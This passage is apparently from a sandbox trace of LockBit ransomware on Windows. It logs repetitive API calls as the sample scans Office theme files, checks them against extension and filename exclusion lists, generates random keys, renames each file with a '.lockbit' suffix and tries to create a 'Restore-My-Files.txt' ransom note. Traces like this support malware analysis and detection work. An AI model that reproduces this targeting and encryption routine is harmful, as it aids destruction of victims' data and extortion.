lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.099] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.099] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.099] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.lockbit") returned 87 [0194.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.100] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.100] malloc (_Size=0x40068) returned 0x3df0008 [0194.100] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26989) returned 1 [0194.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.102] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.108] malloc (_Size=0xc4) returned 0x1fa2ed8 [0194.108] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0194.109] free (_Block=0x1fa2ed8) [0194.109] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.109] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.109] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68efb300, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe598f420, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x68efb300, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x96e87, dwReserved0=0x0, dwReserved1=0x0, cFileName="Black Tie.eftx", cAlternateFileName="BLACKT~1.EFT")) returned 1 [0194.109] lstrcmpiW (lpString1=".", lpString2="Black Tie.eftx") returned -1 [0194.109] lstrcmpiW (lpString1="..", lpString2="Black Tie.eftx") returned -1 [0194.109] PathFindExtensionW (pszPath="Black Tie.eftx") returned=".eftx" [0194.109] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.109] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.109] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.110] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.110] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.110] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.110] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.110] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.110] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Black Tie.eftx") returned 1 [0194.111] lstrcmpiW (lpString1="ntldr", lpString2="Black Tie.eftx") returned 1 [0194.111] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Black Tie.eftx") returned 1 [0194.111] lstrcmpiW (lpString1="bootsect.bak", lpString2="Black Tie.eftx") returned 1 [0194.111] lstrcmpiW (lpString1="autorun.inf", lpString2="Black Tie.eftx") returned -1 [0194.111] lstrcmpiW (lpString1="thumbs.db", lpString2="Black Tie.eftx") returned 1 [0194.111] lstrcmpiW (lpString1="iconcache.db", lpString2="Black Tie.eftx") returned 1 [0194.111] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.111] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned=".eftx" [0194.111] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.111] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.111] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.112] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.112] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.lockbit") returned 90 [0194.112] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0194.113] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.113] malloc (_Size=0x40068) returned 0x1ff1e60 [0194.113] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=618119) returned 1 [0194.113] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0194.113] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0194.114] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.119] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.119] malloc (_Size=0xca) returned 0x1fa2ed8 [0194.119] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.120] free (_Block=0x1fa2ed8) [0194.120] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.120] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.120] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.120] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72f4900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59b5580, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x72f4900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xa7a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Civic.eftx", cAlternateFileName="CIVIC~1.EFT")) returned 1 [0194.120] lstrcmpiW (lpString1=".", lpString2="Civic.eftx") returned -1 [0194.120] lstrcmpiW (lpString1="..", lpString2="Civic.eftx") returned -1 [0194.120] PathFindExtensionW (pszPath="Civic.eftx") returned=".eftx" [0194.120] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.120] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.120] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.120] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.120] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.120] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.120] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.120] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.120] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.120] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.121] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.121] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.122] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.122] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Civic.eftx") returned 1 [0194.122] lstrcmpiW (lpString1="ntldr", lpString2="Civic.eftx") returned 1 [0194.122] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Civic.eftx") returned 1 [0194.122] lstrcmpiW (lpString1="bootsect.bak", lpString2="Civic.eftx") returned -1 [0194.122] lstrcmpiW (lpString1="autorun.inf", lpString2="Civic.eftx") returned -1 [0194.122] lstrcmpiW (lpString1="thumbs.db", lpString2="Civic.eftx") returned 1 [0194.122] lstrcmpiW (lpString1="iconcache.db", lpString2="Civic.eftx") returned 1 [0194.122] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.122] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned=".eftx" [0194.122] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.123] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.123] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.124] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.lockbit") returned 86 [0194.124] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.124] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.125] malloc (_Size=0x40068) returned 0x3df0008 [0194.125] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=42917) returned 1 [0194.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.126] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.135] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.135] malloc (_Size=0xc2) returned 0x1fa2ed8 [0194.135] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0194.136] free (_Block=0x1fa2ed8) [0194.136] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.136] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.136] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x465d9a00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59db6e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x465d9a00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x8032, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clarity.eftx", cAlternateFileName="CLARIT~1.EFT")) returned 1 [0194.136] lstrcmpiW (lpString1=".", lpString2="Clarity.eftx") returned -1 [0194.136] lstrcmpiW (lpString1="..", lpString2="Clarity.eftx") returned -1 [0194.136] PathFindExtensionW (pszPath="Clarity.eftx") returned=".eftx" [0194.136] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.136] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.136] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.136] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.136] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.136] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.136] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 